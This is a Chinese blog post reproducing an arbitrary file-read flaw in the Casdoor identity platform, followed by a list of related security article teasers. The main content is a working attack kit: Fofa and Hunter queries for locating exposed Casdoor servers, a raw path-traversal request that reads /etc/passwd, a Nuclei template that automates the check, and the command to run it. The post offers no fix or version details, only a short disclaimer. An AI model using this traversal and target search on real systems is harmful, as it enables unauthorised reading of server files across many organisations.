记一次某信的漏洞复现

最新推荐文章于 2024-09-14 12:49:05 发布
最新推荐文章于 2024-09-14 12:49:05 发布
阅读量63 收藏
点赞数
分类专栏: 漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/133863479
版权

公众号:掌控安全EDU 分享更多技术文章,欢迎关注一起探讨学

目录

【漏洞介绍】

【资产测绘Query】

【漏洞复现】

【漏洞介绍】

Casdoor系统static存在任意文件读取漏洞

【漏洞描述】
Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。

【资产测绘Query】

Fofa:title:”Casdoor”
Hunter:web.title=”Casdoor”

【漏洞复现】

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1

图片


【Nuclei-Poc】

id: template-id

info:
  name: Template Name
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |+
        GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - root
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0"

【验证】

nuclei.exe -duc -u http://target.com -t C:\Users\xxx\nuclei-templates\Casdoor-demo.yaml -debug

图片

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

黑客大佬
关注
专栏目录
物联网安全:防御网络攻击的关键技术
程序员光剑
01-08 1020
1.背景介绍 随着物联网(Internet of Things, IoT)技术的发展,物联网已经成为我们生活、工作和经济的重要组成部分。物联网设备广泛应用于家居、工业、交通、能源、医疗等领域,为我们提供了许多便利和效率。然而,物联网设备的普及也带来了安全隐患。 物联网设备通常具有低成本、低功耗、低延迟等特点,但这也意味着它们的安全性和可靠性可能受到威胁。物联网设备的安全问题不仅可能导致个人隐私...
新版 Java 惊现“年度加密漏洞”,网友:还好我只用 Java 8
moose_killer的博客
04-28 191
Java 作为当前最流行的编程语言之一,常被用于企业级应用开发中。 近日,安全公司 ForgeRock 的研究员 Neil Madden 发现在 Java 15、16、17、18 版本的 ECDSA(椭圆曲线数字签名算法)签名验证中存在一个严重漏洞,黑客可以通过该漏洞轻松地伪造 TSL 证书和签名、双因素身份验证消息等,以及对文件和其他数据进行数字签名。 对此,Neil Madden 甚至将该漏洞比作科幻剧《神秘博士》中经常出现的空白纸: 《神秘博士》中有一个反复出现的情节装置,即医生通过出示一张实际
一次时序数据库的实战测试
蚁景网安学院
10-26 606
在某次Edusrc挖掘过程中,我发现了一个404状态码的ip站。我的直觉告诉我,这个站不太简单。于是我信息搜集了一下端口为8086的常见服务,当我看到这个InfluxDB的时候,我灵感突然来了。
汇总-一次对某高校微信小程序的漏洞挖掘-0基础信息安全知识点
程序员三九的博客
05-21 432
挖掘目标的部署在微信的资产(减少信息的收集,毕竟一般web站点没有账号密码不好进入后台,挖掘功能点少)1.寻找目标的微信小程序(非原图)2.招生小程序打不开
某项目的二顾茅庐5K实战
蚁景网安学院
08-27 375
本文录了针对某项目多个漏洞的挖掘过程。漏洞一:存在逻辑缺陷导致无限发布新动态和可修改动态问题;漏洞二:存在突破发布数量限制的问题;漏洞三:查询处因设计缺陷存在拒绝服务攻击漏洞。总结的挖掘思路:突破限制,反其道而行之。
某大学智慧云平台存在弱口令爆破/水平越权信息泄露/Wx_SessionKey篡改 任意用户登录漏洞
2301_80127209的博客
07-23 636
本篇文章是录最近给一所大学做渗透测试时该学校存在的漏洞(目前已经修复)。我是先找该学校的微信小程序的资产,因为各位佬们也知道,微信小程序相对于web应用服务端来讲维护较少,所有漏洞存在多,好挖点。下面就来讲讲我是怎么从这个小程序端渗透到web应用端。
一次对某高校微信小程序的漏洞挖掘
蚁景网安学院
04-15 504
挖掘目标部署在微信的资产,减少信息的收集,毕竟一般web站点没有账号密码不好进入后台,挖掘功能点少。
前端安全——最新:lodash原型漏洞从发现到修复全过程
qq_34761385的博客
03-18 7154
人生的精彩就在于你永远不知道惊喜和意外谁先来,又是一个平平无奇的早晨,我收到了一份意外的惊喜——前端某项目出现lodash依赖原型污染漏洞。咋一听,很新奇。再仔细一看,呕吼,更加好奇了~然后就是了解和修补漏洞之旅。最后的最后,却发现其实这个漏洞修复起来很简单。但是我的整个过程却是充满曲折和离奇。特此录一下。
某大学智慧云平台存在弱口令爆破水平越权信息泄露Wx_SessionKey篡改 任意用户登录漏洞
wananxuexihu的博客
07-05 1354
本篇文章是录最近给一所大学做渗透测试时该学校存在的漏洞(目前已经修复)。我是先找该学校的微信小程序的资产,因为各位佬们也知道,微信小程序相对于web应用服务端来讲维护较少,所有漏洞存在多,好挖点。嘿嘿嘿,下面就来讲讲我是怎么从这个小程序端渗透到web应用端。这次的渗透测试来讲还是很有收获的,特别是第三个Wx_SessionKey篡改 任意用户登录,大家可以去小程序尝试下,大家首先得找到SessionKey、iv以及加密字段三个部分,然后才可以利用这个工具进行篡改,然后任意用户登录。
[网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-24 352
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
银行行业信创操作系统运维差异对比——基于CentOS的麒麟和基于Debian的统信
罗伯特技术屋
08-04 199
虽说统信V20(d版)是基于debian进行的二次开发,但在实际运用中确实有点“水土不服”,不论是交易类的统一C端、企业网银,还是管理类的OA办公,在操作系统选择上,统信目前还不是应用厂商的首选。笔者认为,服务器版统信操作系统V20(d版)最大的问题是全面度和生态兼容性问题,在前述调查中的“系统全面性和兼容性”维度投票中,麒麟系统全面度和兼容性加权平均得分分别为8.4和7.8分,统信系统分别为5.3分和7分,统信系统整体低于麒麟系统。统信系统则一直使用的基于Debian的统信V20(d版)系统。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 995
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-18 451
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
[系统安全] 五十三.DataCon竞赛 (2)2022年DataCon涉网分析之恶意样本IOC自动化提取详解
杨秀璋的专栏
09-01 3428
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文详细介绍2020 Coremail钓鱼邮件识别及分析内容。这篇文章是作者2022年参加清华大学、奇安信举办的DataCon比赛,主要是关于涉网FZ分析,包括恶意样本IOC自动化提取和攻击者画像分析两类题目。这篇文章来自L师妹的Writeup,经同意后分享给大家,推荐大家多关注她的文章,也希望对您有所帮助。
2024 年浙江省网络安全行业网络安全运维工程师项目 职业技能竞赛网络安全运维工程师(决赛样题)
Aluxian_的博客
09-13 876
作为一名网络安全运维工程师,你发现公司的内部网络出现了异常流量,多个关键应用程序的响应速度显著下降,你需要对网络流量进行深入分析,识别潜在的安全威胁,追踪可疑活动,以确保公司数据的安全性。
网络安全入门教程(非常详细)从零基础入门到精通
2301_77160226的博客
09-11 1362
网络安全是一个非常重要的领地,随着互联网的普及和信息化程度的不断提升,网络安全的重要性也越来越凸显,在日常生活和日常中保护个人信息和隐私,提高安全意识,不随意识泄露敏感信息和密码。对想要从网络安全工作的人来说,需要具备扎实的计算机和错误基础和安全性掌握最新的技术和工具,不断提高防护范围和应对能力。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1219
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
【隐私计算】Cheetah安全多方计算协议-阿里安全双子座实验室
最新发布
木亦汐丫
09-14 1180
2PC-NN安全推理与实际应用之间仍存在较大性能差距,因此只适用于小数据集或简单模型。Cheetah仔细设计DNN,基于格的同态加密、VOLE类型的不经意传输和秘密共享,提出了一个2PC-NN推理系统Cheetah,比CCS'20的CrypTFlow2开销小的多,计算效率更快,通信效率更高。主要贡献有两点:基于格的同态加密的协议可在不进行任何昂贵同态Rotation操作的情况下评估线性层;提出了非线性函数的几个精简且通信高效的原语。
漏洞复现:验证、评估与安全实践的关键步骤
漏洞复现是网络安全领域中至关...漏洞复现不仅是专业人士必备的技能,也是软件开发、安全审计和教育领域不可或缺的一部分。通过系统的漏洞复现实践,我们可以不断改进安全防护措施,确保数字化世界的安全基石更为坚固。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值